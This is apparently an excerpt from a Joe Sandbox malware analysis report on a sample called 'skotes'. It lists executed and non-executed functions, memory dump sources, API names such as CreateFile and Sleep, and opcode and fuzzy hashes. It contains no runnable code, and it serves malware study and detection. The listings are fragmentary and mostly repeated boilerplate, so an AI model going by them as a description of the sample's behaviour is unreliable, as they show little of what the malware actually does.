                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                    • Opcode ID: adf43102aadc0947b84c3d73165ea3ed6bf4b735a453cd024515d82ac20fa172
                                                                                                                                                                    • Instruction ID: 2beaf7a94036eabe0f7cedfc6d53698a75f93ffabdb8f8daf1a1d044df518219
                                                                                                                                                                    • Opcode Fuzzy Hash: adf43102aadc0947b84c3d73165ea3ed6bf4b735a453cd024515d82ac20fa172
                                                                                                                                                                    • Instruction Fuzzy Hash: C1D06C3204010DBBDF129F84DC42EDA3BAAAB48654F015100BE1866020C632E821AB94
                                                                                                                                                                    Function 00626C70 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                    • Opcode ID: de1abac14e7383ea361f576b31166ebdf466750f0f20137ba5d375b926ab0890
                                                                                                                                                                    • Instruction ID: 0b4dfda0b931557ea8ce7a698ff4712c51bcb391020b0e016b0a2527170ce9b5
                                                                                                                                                                    • Opcode Fuzzy Hash: de1abac14e7383ea361f576b31166ebdf466750f0f20137ba5d375b926ab0890
                                                                                                                                                                    • Instruction Fuzzy Hash: FEF0F471A00A20EBC700BB68DC03B0EBB76EB46B60F84075CE825672D1EB301A044BD7
                                                                                                                                                                    Function 04E70B57 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3386607158.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_4e70000_skotes.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 2cbb2e0c9942821fe38623e5cad715167f0aba7b9f310ad956d19bb9f551dce4
                                                                                                                                                                    • Instruction ID: 609016486d25a48e0f51383bb7521cd3e49096405eb4fc32a253b88f13cad855
                                                                                                                                                                    • Opcode Fuzzy Hash: 2cbb2e0c9942821fe38623e5cad715167f0aba7b9f310ad956d19bb9f551dce4
                                                                                                                                                                    • Instruction Fuzzy Hash: 261104E324D351AEE243D6551F609F67F29EB9723833051ABF443CA143E2862B466262
                                                                                                                                                                    Function 04E70C99 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3386607158.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_4e70000_skotes.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 76b999479867b9126526f5346b2c944156e5e89bd7f154f3810ba3155393abdf
                                                                                                                                                                    • Instruction ID: d7002a177fa5e664937d235654ce7c4e54ab7e7ccd0df97079f2ba9d30b1fec3
                                                                                                                                                                    • Opcode Fuzzy Hash: 76b999479867b9126526f5346b2c944156e5e89bd7f154f3810ba3155393abdf
                                                                                                                                                                    • Instruction Fuzzy Hash: E70128D620E6C06EF201C1223B68EF76F6CDBD1631335959FF481C9407E20A598FA171

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 00630E13 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00630F16
                                                                                                                                                                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00630F62
                                                                                                                                                                      • Part of subcall function 0063265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00632750
                                                                                                                                                                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00630FCE
                                                                                                                                                                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00630FEA
                                                                                                                                                                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0063103E
                                                                                                                                                                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0063106B
                                                                                                                                                                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 006310C1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                                                                                                                                    • String ID: (
                                                                                                                                                                    • API String ID: 2943730970-3887548279
                                                                                                                                                                    • Opcode ID: cb9de990eb07fa2cd110fe91f53614556a9906ebd8e2575a023f9537bd944488
                                                                                                                                                                    • Instruction ID: 5138d4fdae01e44bf0e78dbd4202e25c6debad8ef2b025d9be8ec7c45f982905
                                                                                                                                                                    • Opcode Fuzzy Hash: cb9de990eb07fa2cd110fe91f53614556a9906ebd8e2575a023f9537bd944488
                                                                                                                                                                    • Instruction Fuzzy Hash: DFB17C70A00615EFDB28CF68D9A1ABAB7B6FF45700F14416DE906AB341D770AD81CB94
                                                                                                                                                                    Function 00631602 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00632CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00632D0F
                                                                                                                                                                    • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00631614
                                                                                                                                                                      • Part of subcall function 00632E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00632E39
                                                                                                                                                                      • Part of subcall function 00632E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00632EA8
                                                                                                                                                                    • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00631746
                                                                                                                                                                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 006317A6
                                                                                                                                                                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 006317B2
                                                                                                                                                                    • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 006317ED
                                                                                                                                                                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0063180E
                                                                                                                                                                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0063181A
                                                                                                                                                                    • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00631823
                                                                                                                                                                    • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0063183B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2508902052-0
                                                                                                                                                                    • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                    • Instruction ID: bbbe8dc2f832b48bdc9163e14e7dc820bc79c23bc83e192d69aab1f70179c68d
                                                                                                                                                                    • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                    • Instruction Fuzzy Hash: 63815771E002259FCB18CFA8C991AADB7F2BF4A304F1986ADD445AB701C730AD52CBC4
                                                                                                                                                                    Function 0063EC48 Relevance: 6.1, APIs: 4, Instructions: 139COMMON
                                                                                                                                                                    Download Yara Rule
